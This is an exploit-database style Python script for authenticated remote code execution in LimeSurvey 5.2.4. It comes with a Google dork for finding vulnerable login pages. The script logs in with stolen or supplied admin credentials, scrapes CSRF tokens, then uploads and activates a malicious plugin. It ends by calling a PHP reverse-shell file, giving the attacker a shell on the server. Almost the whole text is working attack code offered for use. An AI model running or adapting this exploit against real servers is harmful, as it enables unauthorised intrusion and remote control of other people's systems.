# Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated) # Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login # Date: 05/12/2021 # Exploit Author: Y1LD1R1M # Vendor Homepage: https://www.limesurvey.org/ # Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip # Version: 5.2.x # Tested on: Kali Linux 2021.3 # Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE #!/usr/bin/python # -*- coding: utf-8 -*- import requests import sys import warnings from bs4 import BeautifulSoup warnings.filterwarnings("ignore", category=UserWarning, module='bs4') print("_______________LimeSurvey RCE_______________") print("") print("") print("Usage: python exploit.py URL username password port") print("Example: python exploit.py http://192.26.26.128 admin password 80") print("") print("") print("== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==") print("== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==") print("== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==") print("== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==") print("== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==") print("== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==") print("") print("") url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] port = sys.argv[4] req = requests.session() print("[+] Retrieving CSRF token...") loginPage = req.get(url+"/index.php/admin/authentication/sa/login") response = loginPage.text s = BeautifulSoup(response, 'html.parser') CSRF_token = s.findAll('input')[0].get("value") print(CSRF_token) print("[+] Sending Login Request...") login_creds = { "user": username, "password": password, "authMethod": "Authdb", "loginlang":"default", "action":"login", "width":"1581", "login_submit": "login", "YII_CSRF_TOKEN": CSRF_token } print("[+]Login Successful") print("") print("[+] Upload Plugin Request...") print("[+] Retrieving CSRF token...") filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds) UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index") response = UploadPage.text s = BeautifulSoup(response, 'html.parser') CSRF_token2 = s.findAll('input')[0].get("value") print(CSRF_token2) Upload_creds = { "YII_CSRF_TOKEN":CSRF_token2, "lid":"$lid", "action": "templateupload" } file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds) UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm") response = UploadPage.text print("[+] Plugin Uploaded Successfully") print("") print("[+] Install Plugin Request...") print("[+] Retrieving CSRF token...") InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin") response = InstallPage.text s = BeautifulSoup(response, 'html.parser') CSRF_token3 = s.findAll('input')[0].get("value") print(CSRF_token3) Install_creds = { "YII_CSRF_TOKEN":CSRF_token3, "isUpdate": "false" } file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds) print("[+] Plugin Installed Successfully") print("") print("[+] Activate Plugin Request...") print("[+] Retrieving CSRF token...") ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate") response = ActivatePage.text s = BeautifulSoup(response, 'html.parser') CSRF_token4 = s.findAll('input')[0].get("value") print(CSRF_token4) Activate_creds = { "YII_CSRF_TOKEN":CSRF_token4, "pluginId": "1" # CHANGE THIS } file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds) print("[+] Plugin Activated Successfully") print("") print("[+] Reverse Shell Starting, Check Your Connection :)") shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS